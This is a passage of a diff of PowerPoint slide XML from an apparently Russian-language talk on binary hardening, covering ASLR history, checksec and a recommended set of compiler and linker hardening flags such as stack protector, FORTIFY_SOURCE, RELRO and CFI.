+            <a:lvl7pPr marL="2971800" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl7pPr>
+            <a:lvl8pPr marL="3429000" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl8pPr>
+            <a:lvl9pPr marL="3886200" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl9pPr>
+          </a:lstStyle>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Одна из первых </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>hardening-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>защит</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>PaX</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>патч, 2001</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Linux, 2005</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Windows, 2007 (Vista, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>оверхед для 32-битных </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Windows </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>намного выше из-за архитектуры</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> DLL</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="TextBox 7">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C79865B-22C3-4DF0-B0E0-DBD353338363}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="8069931" y="4214756"/>
+            <a:ext cx="3796553" cy="461665"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>https://picryl.com/media/shipping-containers-cargo-port-industry-craft-9326e8</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -32582,7 +32847,12 @@
             <p:ph type="title"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="838200" y="18255"/>
+            <a:ext cx="10515600" cy="1325563"/>
+          </a:xfrm>
+        </p:spPr>
         <p:txBody>
           <a:bodyPr/>
           <a:lstStyle/>
@@ -32595,160 +32865,6 @@
               <a:rPr lang="en-US" dirty="0"/>
               <a:t>?</a:t>
             </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{861B54C4-30F2-41AC-AD28-53F5FBB73FC4}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Проверить дефолтные опции при сборке продуктового кода и дистрибутива</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Решить с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Security Team </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>какие </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>hardening</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>-методы включить</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Поиск недозащищённых программ (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>no-PIE, etc.) </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>можно автоматизировать с помощью </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>утилиты </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>checksec</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Может проверить наличие </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>noexecstack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, PIE, _FORTIFY_SOURCE, RELRO, etc.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пока </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>(?) </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>не поддерживает более новые защиты</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>все виды </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CFI (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>#302</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>), Stack Clashing (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>#300</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>), Safe Stack (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId5"/>
-              </a:rPr>
-              <a:t>#301</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>), etc.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -32778,6 +32894,370 @@
               <a:t>82</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="11" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EA9C31B-4E86-4B0E-A53A-AA39A4B9C3E6}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks/>
+          </p:cNvSpPr>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="838200" y="1825625"/>
+            <a:ext cx="10515600" cy="4351338"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
+            <a:normAutofit lnSpcReduction="10000"/>
+          </a:bodyPr>
+          <a:lstStyle>
+            <a:lvl1pPr marL="228600" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="1000"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="2800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl1pPr>
+            <a:lvl2pPr marL="685800" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="2400" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl2pPr>
+            <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="2000" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl3pPr>
+            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl4pPr>
+            <a:lvl5pPr marL="2057400" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl5pPr>
+            <a:lvl6pPr marL="2514600" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl6pPr>
+            <a:lvl7pPr marL="2971800" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl7pPr>
+            <a:lvl8pPr marL="3429000" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl8pPr>
+            <a:lvl9pPr marL="3886200" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl9pPr>
+          </a:lstStyle>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Проверить дефолтные опции при сборке продуктового кода и дистрибутива</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Решить с Security Team какие hardening-методы включить</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Минимальный рекомендуемый набор</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>ASLR (-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>fPIE</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> -pie)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Stack Protector (-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>fstack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>-protector-strong)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Фортификация (-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>D_FORTIFY_SOURCE=2)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Full RELRO (-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Wl</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>,-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>z,relro</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Wl</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>,-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>z,now</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Защита от </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Stack Clash</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>fstack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>-clash-protection)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Control-flow Integrity (-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>fcf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>-protection </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>на </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>X86, -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>mbranch</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>-protection </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>на </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>AArch64)</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -32816,7 +33296,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DE0E5C5-D212-445A-B152-EE70980D9FFC}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{527B94E6-AC75-496A-80B4-C52365ABC84D}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -32827,14 +33307,19 @@
             <p:ph type="title"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="838200" y="18255"/>
+            <a:ext cx="10515600" cy="1325563"/>
+          </a:xfrm>
+        </p:spPr>
         <p:txBody>
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Что почитать </a:t>
+              <a:t>Что стоит сделать </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -32848,7 +33333,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{947FFF96-69F7-4C4A-8AAB-7A04BDA9C83C}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{861B54C4-30F2-41AC-AD28-53F5FBB73FC4}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -32859,121 +33344,130 @@
             <p:ph idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="838200" y="1434353"/>
+            <a:ext cx="10515600" cy="5104559"/>
+          </a:xfrm>
+        </p:spPr>
         <p:txBody>
-          <a:bodyPr/>
+          <a:bodyPr>
+            <a:normAutofit lnSpcReduction="10000"/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Примеры атак</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
+              <a:rPr lang="ru-RU" sz="2400" dirty="0"/>
+              <a:t>Поиск недозащищённых программ (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2400" dirty="0"/>
+              <a:t>no-PIE, etc.) </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" sz="2400" dirty="0"/>
+              <a:t>можно автоматизировать с помощью утилиты </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>checksec</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>Nightmare</a:t>
-            </a:r>
+              <a:rPr lang="ru-RU" sz="2000" dirty="0"/>
+              <a:t>Лучше собирать самому (в дистрибутивах старая версия</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2000" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" sz="2000" dirty="0"/>
+              <a:t>Лучше также явно проконтролировать флаги</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2000" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" sz="2000" dirty="0"/>
+              <a:t>сборки</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" sz="2400" dirty="0"/>
+              <a:t>Может проверить наличие noexecstack, PIE, _FORTIFY_SOURCE, RELRO, etc.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" sz="2000" dirty="0"/>
+              <a:t>Пока (?) не поддерживает некоторые новые защиты: Stack Clashing (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" sz="2000" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>#300</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" sz="2000" dirty="0"/>
+              <a:t>), Safe Stack (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" sz="2000" dirty="0">
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t>#301</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" sz="2000" dirty="0"/>
+              <a:t>), LLVM CFI</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>Overview of GLIBC heap exploitation techniques</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Руководства по </a:t>
-            </a:r>
